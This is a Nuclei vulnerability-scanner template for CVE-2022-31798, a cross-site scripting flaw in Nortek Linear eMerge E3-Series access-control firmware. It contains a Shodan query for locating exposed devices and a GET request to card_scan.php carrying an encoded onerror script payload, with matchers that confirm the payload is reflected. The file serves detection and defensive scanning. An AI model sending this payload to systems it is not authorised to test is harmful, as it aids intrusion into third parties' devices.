nuclei-templates/http/cves/2022/CVE-2022-31798.yaml

53 lines
1.9 KiB
YAML

id: CVE-2022-31798
info:
name: Nortek Linear eMerge E3-Series - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Nortek Linear eMerge E3-Series.
reference:
- https://packetstormsecurity.com/files/167992/
- http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31798
- https://eg.linkedin.com/in/omar-1-hashem
- https://gist.github.com/omarhashem123/bccdcec70ab7e8f00519d56ea2e3fd79
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-31798
cwe-id: CWE-384
epss-score: 0.0012
epss-percentile: 0.46105
cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: nortekcontrol
product: emerge_e3_firmware
shodan-query: http.title:"eMerge"
tags: cve2022,emerge,nortek,xss,packetstorm,cve,nortekcontrol
http:
- method: GET
path:
- '{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- ',"CardFormatNo":"<img src=x onerror=alert(document.domain)>"}'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022032222a723e342defaea20a65006081fa04694cc253dd9b9a9682c53a3c875733022100948eabf49241351ba4010392912c47e84feca08fc4c338fbb8d3de48c20c0900:922c64590222798bb761d5b6d8e72950